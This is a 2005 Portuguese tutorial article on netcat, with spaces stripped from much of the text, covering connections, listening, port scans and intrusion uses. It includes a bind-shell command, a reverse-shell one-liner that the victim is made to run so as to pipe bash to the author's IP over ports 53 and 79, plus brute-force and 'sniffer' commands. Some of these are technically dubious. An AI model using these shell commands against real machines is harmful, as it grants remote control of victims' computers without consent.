Sunteți pe pagina 1din 6

13/03/2015

Netcat - O canivete suco do TCP/IP [Artigo]

NETCATOCANIVETESUCODOTCP/IP
Autor:Perfilremovido<>
Data:16/03/2005

INTRODUZINDOLHES

Onetcatumprogramaparaconsultoriaderedesmuitoconhecido,issodeveseaofatodeeleser
um programa muito verstil, podendo desde ser um simples telnet at uma ferramenta de brute
force.Aseguirexplicaremoscomoobtloenaspginasseguintes,seufuncionamentoecomoque
elefazisso.

OBTENDOOCANIVETESUO

AmaioriadasdistribuiesLinuxjvemcomonetcatinstalado,outrasvemcomeleprinstalado.
Caso sua distribuio ainda no tenha o netcat, voc pode obtlo em www.securityfocus.com
(http://www.securityfocus.com)ewww.packetstormsecurity.net(http://www.packetstormsecurity.net).
Parachamaroprograma,bastaosimplescomando:
$nc
GruposdediscussosobreoNetcatestoemsecurityfocus.comenoYahoo!(pelomenossoos
queeuparticipo).
Napginaseguinte,veremosateoria,ousejacomoelefunciona.

COMOONETCATFUNCIONA

AprincpiooNetcatfoilanadoparaserumtelnetaprimorado.Atentoanicautilidadequeele
teriaseriaseconectaraumhost.Eeutegaranto,athojeanicacoisaqueelefazissomesmo,
se conectar a um host. Mas a voc me pergunta: "Mas no comeo do artigo voc disse que ele
poderiaservirparaescanearhostsefazerbruteforces?"
Pararesponderessapergunta,vamosvoltaraonossoeletrizanteepisdiosobreocomooNetcat
nasceu. Como j dito, ele nasceu para se conectar hosts, nisso, consultores do mundo inteiro
http://www.vivaolinux.com.br/artigos/impressora.php?codigo=2215

1/6

13/03/2015

Netcat - O canivete suco do TCP/IP [Artigo]

alertaram para a AtStake (fundao que mantinha o Netcat) que opes como listen,
redirecionamentodedadosecriaodelogspoderiamserincludasnoprograma,deformaano
alterarsuaprincipalfuncionalidade,aconexo.
Agora,eufaoumapergunta:"Comoquerealizadoobruteforce?"
O bruteforce o mtodo de tentativa de obteno de senhas utilizado quando um cliente se
conectaaumhostetentaselogar,utilizandoumaseqnciadesenhasqueestoemumarquivo.
Ou seja, se eu pegar o Netcat, que nada mais do que um telnet aprimorado, eu posso me
CONECTARaohostecomumalinhadecomando,possocompletarocomandocomacomparao
paraobtenodassenhas.Comoveremosmaisadianteocomandoficariaassim:
$ncvv79</home/tzbishop/wordlist.txt>/home/tzbishop/lognc.txt
Damesmaforma,paraescanearumhost,bastamandaroNetcatseconectaratodasasportasdo
computador analisado, assim primeiro ele se certificar de quais as portas abertas que ele pode
estabelecercontato.
Respondidaanossaperguntinhadocomeodapgina.
VejaaseguirasintaxedeutilizaodoNetcat...

UTILIZANDOONETCAT

Estaparteserprtica,massempreutilizandoosconceitosjaprendidosanteriormente.
ONetcatchamadocomocomando"nc",vocpodetantodarassintaxesdepoisdonc,quantona
linha"CMDLINE"queapareceapsocomando"nc"simples.
ParalistarassintaxesdisponveisnoNetcat,digite:
$nch
Atelaficarmaisoumenosassim:

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=2215

2/6

13/03/2015

Netcat - O canivete suco do TCP/IP [Artigo]

Agoravamostraduzirassintaxesparaoportugusparaomelhorcompreendimentodetodos:
l=colocaumaportaemestadodelistenning(escuta)
p=defineumaporta
v=ativaorecebimentodeeco
vv=ativaorecebimentodeeco.Mostramaisdetalhesquev
u=utilizaoprotocoloUDPaoinvsdeTCP
t=paraseconectaraTELNET
o=geraumlogemformatohexadecimal
w=determinaumtempomximoparaaguardarumareposta
e=redirecionaarquivos
n=recebeefazconexesapenasemformatonumrico(IP)

mais do que bvio que comandos e sintaxes do Linux podem ser misturadas, assim como a
utilizaodepipes(|),<,>e>>.
Veremosagora,aversatilidadeeutilizaodoscomandosemao:

1)CONECTANDOSEAUMHOST

feita da mesma maneira que o telnet. especificado apenas um host e a porta a se conectar.
Exemplos:
$ncmail.yahoo.com.br110
$ncwww.terra.com.br80
http://www.vivaolinux.com.br/artigos/impressora.php?codigo=2215

3/6

13/03/2015

Netcat - O canivete suco do TCP/IP [Artigo]

Lembrandoqueaporta110dosservidoresdePOP3ea80paraweb.

2)ABRINDOUMAPORTA(LISTENNING)

utilizadaasintaxelparacolocaremlistenningevvpararetornarecocomdetalhes.Aseguir
estipuladaaporta:
$nclp53vv
Serretornadaumamensagem:
"listenningon[any]53..."

3)ESCANEANDOPORTASCOMONETCAT

Ser feita uma tentativa de conexo um IP ou host e ser estipulada as portas da tentativa de
conexo:
$ncvvwww.vivaolinux.com.br11080139
$ncvvwww.vivaolinux.com.br110000
No primeiro exemplo sero escaneadas apenas as portas 110 (POP3), 80 (web) e 139
(compartilhamentodoWindows).
Jnosegundoexemploseroescaneadasdesdeaporta1ata10000.

4)ABRINDOAPORTA,DANDOENTRADAPARAUM"SHELL"(=TROJAN)

Ser colocada a porta X em listenning, redirecionaremos a sada de dados para um shell


(/bin/bash).Assimquandoalgumseconectaraessaportaterdomniototalsobreocomputador.
Funcionadeformasemelhanteaumtrojan.
$ncle/bin/bashp1033

5)REALIZANDOUMBRUTEFORCE

Napginaanterioreujdisponibilizeiasintaxe,ouseja,comosefaz.Vejaasintaxenovamente:

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=2215

4/6

13/03/2015

Netcat - O canivete suco do TCP/IP [Artigo]

$ncvv79<~/wordlists.txt>bruteforce.log
Perceba, que conectaremos a porta do FINGER(79) e redirecionaremos o contedo do arquivo
wordlists.txt para essa porta. Quando algum resultado for vlido ele ser salvo em bruteforce.log
paraumaanliseposteriordosresultados.

6)FAZENDOUMSNIFFER

Alm de tudo isto demonstrado acima, o 'amazing' Netcat ainda pode capturar todo o trfego de
umarede.Euachoquevocjsabecomofazerissoseobservarosredirecionamentosutilizados
noexemploanterior.Masvamosl.
Iremos nos conectar a uma porta e mandar o netcat "dar eco" nela, ou seja, exibir TUDO o que
passa por ela. Aps isso, s redirecionar tudo o que o Netcat gravou para um arquivo. Veja a
sintaxe,paramelhorcompreenso:
$ncvvL127.0.0.1p80>~/sniffer.log

FAZENDOUMACONEXOREVERSACOMONETCAT

A conexo reversa um mtodo de invaso parecida com os trojans, porm ocorre de maneira
contrria, ou seja, no ser o invasor que se conectar ao host, mas o host se conectar ao
invasor, concedendolhe poderes administrativos. O mais surpreendente que utilizando a
imaginao, podemos fazer isso com o Netcat. Vamos relembrar as caractersticas aprendidas do
Netcat:
Abrirportas
Estabelecerconexo
Redirecionartrfegodeumaportaparaumprograma.

Sabendodisso,vamostomarumIPfictciodeexemplo=200.212.21.2.Oqueteremosquefazer
abrirumaportaemnossocomputadorlocalefazer,executandoumcdigoarbitrrionocomputador
davtima,comqueelaseconecteaonossocomputadorenosconcedapoderesemsuamquina.
Vamosnomodogrficoeabriremosduasjanelas,abrindoasportas53e79:
$nclnp53vv
$nclnp79vv

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=2215

5/6

13/03/2015

Netcat - O canivete suco do TCP/IP [Artigo]

Apsisso,faremoscomqueavtimaexecuteoseguintecdigonocomputadordela:
$nc<NOSSOIP>53|/bin/bash|nc<NOSSOIP>79
Issofarcomqueoscomandosquensdermosnaporta53,passempeloshellbashearesposta
sejaredirecionadanaporta79.
Lembrandoqueasportas53e79foramutilizadas,poisofirewalldeixaessasportasabrirem,pois
sodeconsultasDNSeFINGERrespectivamente.

FINALIZANDO

Comovimos,oNetcatrealmenteumcanivetesuoepodeserutilizadoparadiversosfins,desde
aanlisederedesporadministradorescompetentesatainvasodecomputadoreseredes.Mas
nosissoqueoNetcatcapazdefazer,comumpoucodeimaginao,vocvaidescobrindo
maistruqueseumasriedecoisasestodisponveisnestemaravilhosoprograma.
Aquiterminaomeuartigo,esperoqueeletenhasidotilparatodosqueoleram.
Qualquerdvidapostemaquinoartigomesmooumandeumemailparatzbishop2katyahoo.esque
tereiprazeremrespondlos.
Abraostodos!
Maislinksparaaprendizado:
http://www.vivaolinux.com.br(http://www.vivaolinux.com.br)
http://www.tzbishop.v10.com.br(http://www.tzbishop.v10.com.br)
http://www.securityfocus.com(http://www.securityfocus.com)
http://www.packetstormsecurity.net(http://www.packetstormsecurity.net)

Voltar(verArtigo.php?codigo=2215)

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=2215

6/6

S-ar putea să vă placă și